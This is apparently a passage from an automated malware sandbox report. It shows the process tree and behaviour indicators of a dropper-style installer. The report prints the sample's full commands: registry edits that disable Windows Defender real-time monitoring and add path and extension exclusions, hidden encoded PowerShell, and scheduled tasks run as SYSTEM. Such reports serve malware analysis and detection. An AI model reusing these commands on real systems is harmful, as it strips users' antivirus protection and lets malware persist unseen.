SeSecurityPrivilege 2104 WMIC.exe Token: SeTakeOwnershipPrivilege 2104 WMIC.exe Token: SeLoadDriverPrivilege 2104 WMIC.exe Token: SeSystemtimePrivilege 2104 WMIC.exe Token: SeBackupPrivilege 2104 WMIC.exe Token: SeRestorePrivilege 2104 WMIC.exe Token: SeShutdownPrivilege 2104 WMIC.exe Token: SeSystemEnvironmentPrivilege 2104 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2648 wrote to memory of 2884 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 28 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2884 wrote to memory of 2544 2884 Install.exe 29 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2544 wrote to memory of 2576 2544 Install.exe 30 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2576 wrote to memory of 2704 2576 cmd.exe 32 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2704 wrote to memory of 2368 2704 forfiles.exe 33 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2368 wrote to memory of 2624 2368 cmd.exe 34 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2576 wrote to memory of 2604 2576 cmd.exe 35 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2604 wrote to memory of 2608 2604 forfiles.exe 36 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2608 wrote to memory of 2524 2608 cmd.exe 37 PID 2576 wrote to memory of 3060 2576 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Users\Admin\AppData\Local\Temp\7zS9F5B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\7zSA3FD.tmp\Install.exe.\Install.exe /KZqjdidXaW "385121" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2624
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2524
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:3060
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2548
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2592
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2676
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2620
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2384
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2976
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2424
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:2340
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:1924
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe\" PP /NvFdidEBmy 385121 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1976
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"4⤵PID:1928
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn btZaCbGShXZoJDfvCg5⤵PID:1948
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn btZaCbGShXZoJDfvCg6⤵PID:1080
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 6044⤵
- Program crash
PID:2604
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6CFBFD9D-0CBB-4AF8-BC87-646F11C8566F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:804
-
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exeC:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe PP /NvFdidEBmy 385121 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:876
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1332
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2248
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1992
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:936
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2076
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2224
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2088
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2220
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1208
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2228
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:472
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2720
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:584
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:516
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2244
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHrmjaccM" /SC once /ST 00:36:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHrmjaccM"3⤵PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHrmjaccM"3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:880
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1140
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1600
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxkbdyaVa" /SC once /ST 00:20:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxkbdyaVa"3⤵PID:3012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxkbdyaVa"3⤵PID:2324
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2532
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2664
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:1632
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2140
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:2312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:1568
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf"3⤵PID:2784
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf"3⤵
- Modifies data under HKEY_USERS
PID:948 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵PID:2876
-
-
